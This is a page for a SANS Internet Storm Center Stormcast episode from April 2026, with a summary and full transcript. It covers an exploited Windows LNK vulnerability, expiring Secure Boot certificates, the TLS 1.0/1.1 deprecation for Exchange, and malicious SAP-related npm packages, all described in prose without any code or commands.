SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)

SANS Stormcast Thursday, April 30th, 2026: Odd Requests; MSFT LNK Bug Exploited; Secure Boot Fix; TLS Updates; SAP npm malware

6 min

•Apr 30, 2026about 1 month ago

Summary

This episode covers four critical security vulnerabilities and threats: Microsoft's LNK file vulnerability being actively exploited before patches were released, expiring Windows Secure Boot certificates from 2011, the deprecation of TLS 1.0/1.1 for Exchange protocols, and malicious SAP-related npm packages using install-time code execution.

Insights

Zero-day exploitation before vendor patches are released is becoming more common, requiring faster detection and response mechanisms
Legacy certificate and protocol deprecation creates significant operational challenges for enterprises with thousands of systems to inventory and update
Supply chain attacks via npm packages continue to evolve with sophisticated install-time execution hooks targeting developer systems
Reconnaissance scanning for IoT devices (ESP32) and API gateways suggests attackers are actively fingerprinting infrastructure for future exploitation
Organizations must maintain real-time visibility into which systems use deprecated security components to meet compliance deadlines

Trends

Pre-patch exploitation of vulnerabilities before vendor disclosure and updatesIncreased targeting of IoT and embedded devices (ESP32) for firmware manipulationSupply chain compromise through legitimate package repositories with install-time hooksLegacy certificate and protocol deprecation creating enterprise-wide remediation challengesActive reconnaissance scanning for API gateways and IoT endpoints via honeypot detectionNation-state actors (Fancy Bear) leveraging LNK file vulnerabilities against specific targetsEnterprise tooling evolution to help identify systems using deprecated security standardsTLS protocol enforcement pushing organizations to modernize client infrastructure

Topics

Microsoft LNK File Vulnerability Exploitation Windows Secure Boot Certificate Expiration (2011 certificates)TLS 1.0/1.1 Deprecation for Exchange POP3/IMAP4 Supply Chain Security - npm Package Compromise IoT Device Reconnaissance (ESP32 Firmware Flashing)Broadcom API Gateway Fingerprinting Credential Leakage via SMB Connections Microsoft Defender Enterprise Inventory Tools Pre-patch Zero-Day Exploitation Fancy Bear APT Activity Install-Time Code Execution Hooks Enterprise Certificate Management Honeypot-Based Threat Detection Legacy Protocol Deprecation Planning Developer System Compromise Vectors

Companies

Microsoft

Multiple vulnerabilities discussed: LNK file bug exploited before patch, Secure Boot certificate expiration, TLS depr...

Akamai

Reported that Microsoft's LNK vulnerability was already being exploited before the official patch was released

SAP

Malicious npm packages designed to interface with SAP systems were compromised with install-time code execution hooks

Broadcom

API gateway endpoints detected in honeypot requests, potentially being fingerprinted for reconnaissance purposes

Step Security

Security company that provided comprehensive analysis of the SAP-related npm package supply chain compromise

People

Johannes Ulrich

Hosted the daily cybersecurity podcast episode from Jacksonville, Florida

Quotes

"It's sufficient to just look at a directory that contains the malicious file. And then, first of all, you have the usual sort of SMB connection outbound that leaks potential credentials."

Johannes Ulrich•Microsoft LNK vulnerability discussion

"This is actually sort of long overdue and Microsoft has been holding back for a good reason because there was still a significant number of clients that for whatever reasons didn't support newer versions of TLS."

Johannes Ulrich•TLS 1.0/1.1 deprecation discussion

"If you're using either protocol, then make sure that whatever client you're using is able to connect via TLS 1.2 or 1.3."

Johannes Ulrich•Exchange POP3/IMAP4 protocol guidance

"It's the standard brain stall hook trick that's being used here to execute code on the developer system as these packages are being installed."

Johannes Ulrich•SAP npm malware discussion

Full Transcript

Hello and welcome to the Thursday, April 30th, 2026 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ulrich, recording today from Jacksonville, Florida. And this episode is brought to you by the SANS.edu Bachelor's Degree Program in Applied Cybersecurity. in diaries today nothing too special there are two odd web requests that sort of caught my eyes and that came in via our honeypots the first one is a request that appears to be going after the broadcom api gateway don't think that's an exploit as is i think there's really more some kind of fingerprinting or reconnaissance scan similar the second one the second one is going after what I believe, according to the URL, to be ESP32 devices. Saw something here that this may be used to flash firmware on those devices. If anybody has any more experience with either ESP32 or the Prodcom API gateway, let me know if there is more to these particular endpoints and whether there could be some kind of attack being performed via just these individual requests. And then we got an update to Microsoft Patch Tuesday this month This update comes from Akamai in the form of Akamai stating and showing that one of the vulnerabilities being addressed in this month update has already been exploited before Microsoft actually released the update. This was not indicated in Microsoft's update, so it was not labeled as already exploited. Since then, Microsoft has updated its guidance and now also states that this vulnerability is already being exploited or had been exploited before the patch was released. This particular vulnerability is one of those link file vulnerabilities. Now, what makes it particularly dangerous is that a victim does not actually have to open the file. It's sufficient to just look at a directory that contains the malicious file. And then, first of all, you have the usual sort of SMB connection outbound that leaks potential credentials. And these credentials can then be used against the victim again. So, yes, certainly a bad vulnerability has been used by Fancy Bear against Ukraine. and not sure if anywhere else exploitation has been seen before the patch was released. This is also the second attempt Microsoft made to patch this particular vulnerability. And sticking with Microsoft here for another story. Now this one is not really a vulnerability story Instead it all about the good old Windows secure boot certificate And well old is the keyword here Those boot certificates originally issued in 2011 are going to expire in June of this year. I mentioned this a couple times before. And of course, many organizations are having a hard time sort of figuring out where these old certificates are being used and well whether or not they have been updated yet well a microsoft updated a microsoft defender in order to help users to find any systems that still need these updates applied this particular sort of gearing towards enterprise and such which of course they may have thousands of systems that need to be inventoried here and this new feature in microsoft defender is supposed to help them Well, in third Microsoft story here, another TLS-related one or certificate-related one. Well, this one actually more about using TLS and certificates on the network. Microsoft in July is also going to turn off TLS 1.0 and 1.1 for any Exchange POP3 and IMAP4 connections. So, yes, you finally must move up all the way to TLS 1.2 and 1.3. This is actually sort of long overdue and Microsoft has been holding back for a good reason because there was still a significant number of clients that for whatever reasons didn support newer versions of TLS Guess they now essentially cutting them off So if you still using POP3 I haven seen it used in quite a while IMAP4 is still used quite a bit So if you're using either protocol, then make sure that whatever client you're using is able to connect via TLS 1.2 or 1.3. And no podcast episode these days appears to be complete without some kind of supply chain compromise news. The latest is a set of NPM packages that are related to SAP. Now, they're not created by SAP, so they're not official packages in that sense, but they're widely used to interface with SAP. There are a number of security companies that found them. The link I'm going to use is Step Security. They have a pretty comprehensive write-up here, but they're not the only ones that sort of wrote up about this compromise it's the standard brain stall hook trick that's being used here to execute code on the developer system as these packages are being installed so that's probably why many of the supply chain security tools these days will actually flag this as malicious well and this is it for today thanks for listening thanks for liking thanks for subscribing and as always talk to you again tomorrow bye